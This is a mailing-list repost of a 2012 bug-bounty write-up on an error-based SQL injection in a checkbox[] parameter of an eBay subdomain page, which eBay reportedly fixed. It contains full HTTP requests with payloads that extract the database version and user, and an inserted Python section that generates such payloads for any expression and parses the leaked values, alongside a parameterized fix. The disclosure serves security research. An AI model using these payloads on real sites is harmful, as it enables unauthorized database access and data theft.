[Owasp-natal] Exploitable SQLi on Ebay.com - Analysis

Noilson Caio caiogore at gmail.com
Sunday, November 25 18:03:01 UTC 2012


During some hunting on Ebay’s subdomains I found an exploitable SQL
injection which I reported to Ebay’s security team. It took 20 days until
they finally fixed the exploitable SQL injection.

The vulnerable page was located at http://sea.ebay.com/news.php and the
vulnerable parameter was the "checkbox" array POST parameter. During the
research I found that every time you put some SQL statements there it would
show you a typical SQL error message saying that the syntax is wrong. For
example, when I supplied:

Enforcing an error message - @@secalert

    ...
    POST /news.php?time=3&catid=31 HTTP/1.1
    ...
    checkbox%5B%5D=(select @@secalert)

the webserver responded saying: "Unknown system variable 'secalert'".

But every time I supplied correct syntax I saw no results. So the only
chance I saw there was to start a sub-query using a nested SELECT statement,
which would then give me some results when the syntax of the main SELECT
statement is incorrect. So here we go:

SQL Injection PoC 1 - @@version

    POST /news.php?time=3&catid=31 HTTP/1.1
    Referer: http://sea.ebay.com/news/abpost/update/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: sea.ebay.com
    Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
    Content-Length: 243
    Accept-Encoding: gzip, deflate
    Proxy-Connection: Keep-Alive

    checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+%40%40VERSION)%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))

The webserver then responded with the following message. I have marked the
interesting part showing the version of the DBMS in use.

To ensure that it was not just a lucky random result, I decided to make a
second request asking for the current DBMS user.

SQL Injection PoC 2 - user()

    POST /news.php?time=3&catid=31 HTTP/1.1
    Referer: http://sea.ebay.com/news/abpost/update/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
    Cache-Control: no-cache
    Accept-Language: en-us,en;q=0.5
    Content-Type: application/x-www-form-urlencoded
    Host: sea.ebay.com
    Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
    Content-Length: 243
    Accept-Encoding: gzip, deflate
    Proxy-Connection: Keep-Alive

    checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&

The webserver then responded with the following message. I have marked the
interesting part showing the current DBMS user.
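The two payloads above use the same error-based trick: the value of interest
is wrapped between CHAR(68) = 'D' and CHAR(65),CHAR(86),CHAR(73),CHAR(68) =
'AVID', suffixed with ':' and floor(rand()*2), and used as a GROUP BY key, so
that when the temporary-table key collides MySQL echoes the whole key back in
its "Duplicate entry ... for key ..." (error 1062) message. The script below
is an added example, not code from the original post or from eBay's site: it
assembles that payload for any MySQL expression, URL-encodes it into the
checkbox[] array parameter, and pulls the leaked value back out of such an
error. The sample response and the "news" table / integer id column in the
hardened query are constructed assumptions (the post does not show news.php's
SQL).

```python
# Added example (not the original post's code). Builds the error-based
# payload used against checkbox[] above and decodes the leaked value from a
# MySQL "Duplicate entry" (1062) message. Sample response is constructed.
import html
import re
from urllib.parse import urlencode

# Markers from the post: CHAR(68) = 'D' in front, 'AVID' behind the value.
LEFT_MARK = "CHAR(68)"
RIGHT_MARK = "CHAR(65),CHAR(86),CHAR(73),CHAR(68)"


def build_payload(expr):
    """SQL fragment injected into checkbox[]; `expr` is any MySQL
    expression, e.g. @@VERSION, USER() or DATABASE()."""
    keyed = (f"select count(*),concat(CONCAT({LEFT_MARK},({expr}),{RIGHT_MARK}),"
             f"0x3a,floor(rand()*2))x from (select 1 union select 2)a "
             f"group by x limit 1")
    return f"(select 1 and row(1,1)>({keyed}))"


def build_body(expr):
    """application/x-www-form-urlencoded body carrying the array parameter
    (urlencode percent-encodes '[' and ']' as %5B %5D, like the post)."""
    return urlencode({"checkbox[]": build_payload(expr)})


DUP_ENTRY = re.compile(r"Duplicate entry '(.*?)' for key '[^']*'", re.S)


def extract_leak(response_text):
    """Return the value between the D ... AVID markers of a MySQL 1062
    error, or None when the response carries no such error. The rand()
    key collision is probabilistic, so None means "resend the request",
    not "not vulnerable"."""
    text = html.unescape(response_text)      # PHP pages often HTML-escape quotes
    m = DUP_ENTRY.search(text)
    if not m:
        return None
    entry = m.group(1)                       # e.g. "D5.5.28-logAVID:1"
    end = entry.rfind("AVID:")
    if not entry.startswith("D") or end < 1:
        return None
    return entry[1:end]


def safe_in_clause(values):
    """Hardened counterpart for an array parameter (assumed shape; table
    and column are hypothetical): one driver placeholder per element and
    integer-validated values, never string concatenation."""
    if not values:
        return None, ()
    ids = tuple(int(v) for v in values)      # raises ValueError on SQL text
    placeholders = ",".join(["%s"] * len(ids))
    return f"SELECT id, title FROM news WHERE id IN ({placeholders})", ids


# Constructed for the demo, not a capture from sea.ebay.com.
SAMPLE_RESPONSE = (
    "<html><body>MySQL error: Duplicate entry &#039;D5.5.28-logAVID:1&#039; "
    "for key &#039;group_key&#039;</body></html>"
)

if __name__ == "__main__":
    print(build_body("@@VERSION"))
    print(extract_leak(SAMPLE_RESPONSE))
    print(safe_in_clause(["3", "31"]))
```

A request whose response contains no "Duplicate entry" error is
inconclusive with this payload, because the collision depends on rand();
repeat it before concluding anything. The hardened helper shows the shape a
fix takes: every checkbox[] element becomes its own bound parameter, and a
payload like the ones above is rejected before it ever reaches the driver.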

Timeline

October 30th, 2012: Vulnerability found and reported to Ebay (securityresearch at ebay.com)
November 05th, 2012: Vulnerability reported to Ebay once again
November 05th, 2012: Ebay confirms the presence of the SQL injection
November 16th, 2012: Ebay replied that the SQL injection is now fixed
November 18th, 2012: I've published this blog post

Posted by David Vieira-Kurz, Nov 18th, 2012, in:
Bug Bounty <http://blog.majorsecurity.net/categories/bug-bounty/>,
Ebay.com <http://blog.majorsecurity.net/categories/ebay-com/>,
SQL Injection <http://blog.majorsecurity.net/categories/sql-injection/>


-- 
Noilson Caio Teixeira de Araújo
Linux Professional Institute Certification  2 - LPI000182893
ITV3F ITIL Foundation Certificate in IT Service Management (Syllabus 2011)
- EXIN063638
Novell Certified Linux Administrator (CLA) - 10111916
Novell Data Center Technical Specialist

http://ncaio.ithub.com.br
http://br.linkedin.com/in/ncaio
http://www.commandlinefu.com/commands/by/ncaio
http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php